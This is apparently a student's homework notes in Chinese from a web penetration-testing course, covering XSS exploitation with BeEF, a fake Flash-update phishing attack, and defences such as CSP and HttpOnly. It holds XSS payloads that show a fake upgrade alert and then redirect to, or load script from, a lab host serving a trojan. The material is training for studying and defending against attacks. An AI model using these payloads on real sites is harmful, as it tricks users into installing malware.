WEB渗透系统班-XSS 漏洞利用+XSS 漏洞防御&测试思路

WEB渗透测试工程师系统班250303期

第27节课作业

1. 使用beef-xss进行xss漏洞利用

第一步：启动

第二

步：目标靶场注入点注入Hook

第三步：查看信息并且可操作

①浏览器信息和主机信息

②受害者在该网站上的行为

③攻击受害者

2. 复现flash钓鱼利用

第一步：部署可访问的钓⻥⻚⾯并修改

点击页面的自动下载后，自动下载木马

第二步：植⼊XSS代码等待受害者触发

POC：<script>alert("当前浏览器Flash版本过低，请下载升级！")</script><script>location.href='http://192.168.110.225/flash'</script>

点击自动下载后自动下载木马

第二种：外链式

POC：<script src="http://192.168.110.225/flash.js"></script>

3. csp是什么

Content Security Policy (CSP) 是一种基于 HTTP 响应头的安全机制，用于减轻跨站脚本攻击（XSS）、数据注入攻击（如 Clickjacking）等前端安全威胁。

它通过限制网页可以加载和执行的资源（如脚本、样式、图片、字体等）来增强安全性。

1. CSP 的核心作用

防止 XSS（跨站脚本攻击）：阻止未经授权的 JavaScript 执行。

控制资源加载：限制哪些外部域名可以加载脚本、样式、图片等。

阻止内联脚本和 eval()：减少不安全的内联代码执行。

报告违规行为：可配置报告 URI，记录违反 CSP 的行为。

2. CSP 的部署方式

(1) 通过 HTTP 响应头（推荐）

http

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com

(2) 通过 HTML <meta> 标签

html

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">

注意：某些 CSP 指令（如 report-uri）在 <meta> 标签中不可用。

3. 主要 CSP 指令

4. CSP 关键关键字

5. CSP 安全策略示例

Content-Security-Policy:

  default-src 'self';

  script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net;

  style-src 'self' 'unsafe-inline';

  img-src 'self' data:;

  font-src 'self' https://fonts.gstatic.com;

  connect-src 'self';

  frame-src 'none';

  object-src 'none';

  report-uri /csp-report-endpoint;

4. http only是什么

HttpOnly 是一个 Cookie 属性，用于增强安全性，防止敏感的 Cookie 数据被 JavaScript 访问，从而降低 跨站脚本攻击（XSS） 的风险。

HttpOnly 的作用

①阻止 JavaScript 访问 Cookie

设置了 HttpOnly 的 Cookie 无法通过 document.cookie 读取或修改。

仅允许浏览器在 HTTP 请求中自动发送 Cookie（如 Authorization、SessionID）。

②防御 XSS 攻击

即使攻击者注入恶意脚本，也无法窃取 HttpOnly Cookie（如用户会话令牌）。

一、笔记标题：WEB渗透系统班-XSS 漏洞利用+XSS 漏洞防御&测试思路

二、文章内容：

1. 课程内容概要

主要知识点1：CSP

CSP (Content Security Policy 内容安全策略)

内容安全策略是⼀种可信⽩名单机制，来限制⽹站中是否可以包含某来源内容。

该制度明确告诉客户端，哪些外部资源可以加载和执⾏，等同于提供⽩名单，

它的实现和执⾏全部由浏览器完成，开发者只需提供配置。

禁⽌加载外域代码，防⽌复杂的攻击逻辑。

禁⽌外域提交，⽹站被攻击后，⽤户的数据不会泄露到外域。

禁⽌内联脚本执⾏（规则较严格，⽬前发现 GitHub 使⽤）。

禁⽌未授权的脚本执⾏（新特性，Google Map 移动版在使⽤）。

合理使⽤上报可以及时发现XSS，利于尽快修复问题。

同源策略：同域名，同端⼝，同协议

主要知识点2：HttpOnly

HttpOnly可以禁⽌⻚⾯的JavaScript访问带有HttpOnly属性的Cookie

也可以直接在浏览器内为对应的 cookie 值赋予 httponly 属性

主要知识点3：XSSFilter（实体化编码）

检查⽤户输⼊的数据中是否包含特殊字符， 如<、>、’、”,进⾏实体化等。

主要知识点4：⾃动化测试⼯具

传参可控，在能够触发 js的标签内，没有相应防御

XSStrike

2.重点知识与细节

        概念解析

        概念1： CSP

        概念2： HttpOnly

        关键步骤

        步骤1：无

        步骤2：

        步骤3：

        相关代码

3.实操练习 和 解析

如作业，利用工具进行漏洞探测扫描

4.个人总结

        本节课最大的收获是：安装并学习了beef和blue这两个xss利用平台，并且复现了flash钓鱼，了解了CSP和HttpOnly

        仍然存在疑问的地方：暂无

        需要课后深入学习的内容：漏扫的实用工具

基本总结的一些知识点可以了